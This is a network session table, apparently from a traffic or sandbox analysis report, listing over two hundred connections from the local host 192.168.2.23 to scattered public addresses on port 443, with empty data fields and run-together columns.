                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10212192.168.2.235636444.143.168.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10213192.168.2.2347990221.230.70.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10214192.168.2.235011892.77.107.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10215192.168.2.236053425.53.97.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10216192.168.2.2349480216.93.17.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10217192.168.2.2333202212.198.117.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10218192.168.2.2334974192.194.39.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10219192.168.2.2360238154.24.61.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10220192.168.2.2338858123.189.114.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10221192.168.2.235401870.135.122.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10222192.168.2.2348538223.81.211.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10223192.168.2.235754644.211.22.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10224192.168.2.233487432.55.5.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10225192.168.2.2354046115.104.129.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10226192.168.2.2346880217.149.142.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10227192.168.2.235343481.214.25.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10228192.168.2.2346712207.24.78.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10229192.168.2.2341096143.49.81.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10230192.168.2.236012238.188.54.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10231192.168.2.2353576117.162.79.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10232192.168.2.2360286182.234.147.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10233192.168.2.233792896.255.255.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10234192.168.2.2336260170.34.95.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10235192.168.2.2340704122.167.187.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10236192.168.2.2357280169.44.67.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10237192.168.2.23539829.183.167.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10238192.168.2.2342806178.22.63.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10239192.168.2.2347572187.48.49.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10240192.168.2.2341376106.227.199.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10241192.168.2.2359076218.140.8.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10242192.168.2.2349970194.184.150.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10243192.168.2.2355452102.202.12.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10244192.168.2.2341748164.188.46.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10245192.168.2.2339150170.208.200.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10246192.168.2.235956012.94.190.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10247192.168.2.2357100205.64.205.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10248192.168.2.2360750152.160.5.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10249192.168.2.2336172158.77.77.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10250192.168.2.23434708.196.34.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10251192.168.2.2343720220.228.100.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10252192.168.2.2336230172.122.173.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10253192.168.2.233614449.106.88.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10254192.168.2.2341174119.203.183.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10255192.168.2.235645866.17.62.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10256192.168.2.2336568168.216.2.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10257192.168.2.2340616120.32.0.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10258192.168.2.235560460.139.88.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10259192.168.2.2347166157.62.116.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10260192.168.2.2340132123.198.199.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10261192.168.2.2347024211.166.54.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10262192.168.2.2333328183.191.99.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10263192.168.2.233793889.196.225.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10264192.168.2.2342688197.48.80.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10265192.168.2.2357594177.110.68.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10266192.168.2.2358352101.16.240.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10267192.168.2.2357206191.64.95.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10268192.168.2.2342510183.161.2.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10269192.168.2.2335168103.104.17.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10270192.168.2.23465565.176.193.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10271192.168.2.2333256140.56.86.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10272192.168.2.235926294.113.214.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10273192.168.2.234125613.250.244.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10274192.168.2.2343560163.22.66.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10275192.168.2.235387043.228.102.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10276192.168.2.2334384108.83.187.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10277192.168.2.2342958185.74.80.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10278192.168.2.2353998159.196.87.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10279192.168.2.234934413.114.86.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10280192.168.2.2348936159.174.95.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10281192.168.2.234184469.193.209.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10282192.168.2.2341878190.188.180.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10283192.168.2.2342340158.220.163.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10284192.168.2.2341760218.135.107.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10285192.168.2.2357744130.128.207.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10286192.168.2.2358214213.53.195.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10287192.168.2.2359252197.191.167.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10288192.168.2.234889294.134.69.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10289192.168.2.23534145.136.116.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10290192.168.2.234623052.18.31.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10291192.168.2.2348846166.211.120.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10292192.168.2.2346566128.29.208.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10293192.168.2.235220694.129.172.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10294192.168.2.2333620155.79.36.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10295192.168.2.2348984125.253.106.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10296192.168.2.2340000128.132.24.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10297192.168.2.2336070196.43.102.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10298192.168.2.2340084221.216.3.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10299192.168.2.23395201.175.58.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10300192.168.2.2355926133.69.162.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10301192.168.2.2335036181.57.171.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10302192.168.2.234130081.18.144.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10303192.168.2.234514877.64.75.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10304192.168.2.235932253.239.98.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10305192.168.2.234977652.144.37.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10306192.168.2.2345492140.213.20.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10307192.168.2.2347090158.32.79.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10308192.168.2.235667632.222.120.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10309192.168.2.23599764.54.89.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10310192.168.2.2349022115.138.146.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10311192.168.2.234022078.219.140.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10312192.168.2.235430242.9.75.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10313192.168.2.2343334173.34.245.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10314192.168.2.2348658129.124.152.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10315192.168.2.236087454.202.194.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10316192.168.2.234852234.112.166.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10317192.168.2.2357622190.196.159.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10318192.168.2.2354828142.73.61.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10319192.168.2.2355392218.208.117.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10320192.168.2.2340516187.45.143.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10321192.168.2.2337158157.128.71.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10322192.168.2.2356538143.119.32.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10323192.168.2.2333138100.236.211.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10324192.168.2.234849490.244.129.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10325192.168.2.2355066140.76.123.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10326192.168.2.2356308135.56.237.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10327192.168.2.235934834.238.212.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10328192.168.2.2349184156.156.55.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10329192.168.2.2357886153.84.246.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10330192.168.2.2345620191.188.169.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10331192.168.2.2347426206.59.145.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10332192.168.2.233726227.114.137.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10333192.168.2.234430483.158.161.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10334192.168.2.235597246.186.12.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10335192.168.2.2346622200.144.151.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10336192.168.2.235682072.19.139.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10337192.168.2.235192677.60.200.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10338192.168.2.236076079.97.78.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10339192.168.2.2335700176.169.84.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10340192.168.2.2341976188.180.235.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10341192.168.2.234070420.215.69.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10342192.168.2.233605664.144.118.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10343192.168.2.2360154147.187.254.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10344192.168.2.233584483.76.59.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10345192.168.2.2338792223.228.142.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10346192.168.2.2353462162.2.100.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10347192.168.2.2336402112.253.0.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10348192.168.2.2353084110.210.49.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10349192.168.2.2336356213.244.158.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10350192.168.2.2359380174.79.119.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10351192.168.2.2356852121.255.123.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10352192.168.2.235743484.227.85.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10353192.168.2.234688866.61.223.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10354192.168.2.2341066120.97.48.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10355192.168.2.234743868.125.229.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10356192.168.2.2345702135.17.121.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10357192.168.2.2351440134.192.132.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10358192.168.2.2334730213.50.200.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10359192.168.2.2335446123.52.36.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10360192.168.2.233861014.103.115.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10361192.168.2.2341300211.187.124.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10362192.168.2.2357514163.133.52.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10363192.168.2.2343608210.73.195.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10364192.168.2.234864618.100.105.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10365192.168.2.234794018.68.138.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10366192.168.2.2337286109.85.13.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10367192.168.2.2359138200.185.171.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10368192.168.2.2335802100.28.125.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10369192.168.2.2354562199.181.133.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10370192.168.2.2356058103.183.157.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10371192.168.2.233992869.42.4.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10372192.168.2.2348264166.41.130.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10373192.168.2.234602693.15.118.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10374192.168.2.2343832193.175.22.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10375192.168.2.234496843.9.124.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10376192.168.2.2335300158.61.15.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10377192.168.2.234071879.198.180.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10378192.168.2.233539473.221.111.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10379192.168.2.234469277.215.220.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10380192.168.2.233451472.71.147.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10381192.168.2.2342848173.28.92.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10382192.168.2.233329089.93.16.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10383192.168.2.2341378207.111.238.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10384192.168.2.2354258148.187.60.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10385192.168.2.2340046157.11.17.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10386192.168.2.2346134179.80.253.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10387192.168.2.235215271.42.138.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10388192.168.2.2344962205.212.168.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10389192.168.2.234959865.249.135.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10390192.168.2.23339505.6.243.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10391192.168.2.2356924217.2.150.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10392192.168.2.235255898.91.7.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10393192.168.2.233309289.255.182.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10394192.168.2.235660683.190.108.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10395192.168.2.235114494.197.42.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10396192.168.2.2342752199.2.61.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10397192.168.2.2339098222.2.232.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10398192.168.2.2348604188.158.175.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10399192.168.2.2356470222.124.107.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10400192.168.2.234594225.71.123.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10401192.168.2.2349186145.3.111.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10402192.168.2.2342726125.112.173.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10403192.168.2.236076478.55.248.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10404192.168.2.2350010163.43.243.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10405192.168.2.234947413.230.210.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10406192.168.2.2345726106.109.133.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10407192.168.2.234244688.130.190.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10408192.168.2.233475489.172.84.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10409192.168.2.234103827.231.61.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10410192.168.2.2345870166.64.30.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10411192.168.2.23403604.113.245.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10412192.168.2.23587781.50.153.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10413192.168.2.2350478166.17.127.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10414192.168.2.235168432.77.173.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10415192.168.2.235611486.2.189.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10416192.168.2.233499293.110.143.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10417192.168.2.2347254223.238.175.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10418192.168.2.233379498.254.233.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10419192.168.2.235553857.186.4.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10420192.168.2.234005490.85.233.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10421192.168.2.2347138162.9.229.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10422192.168.2.235336863.95.42.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10423192.168.2.2341708163.196.151.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10424192.168.2.235707091.205.90.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10425192.168.2.233708036.237.100.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10426192.168.2.2333506173.186.176.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10427192.168.2.233389884.199.181.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10428192.168.2.234520264.172.49.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10429192.168.2.235633272.185.28.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10430192.168.2.2356814156.228.39.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10431192.168.2.2334588189.173.138.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10432192.168.2.23501722.11.173.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10433192.168.2.235933817.22.225.234443
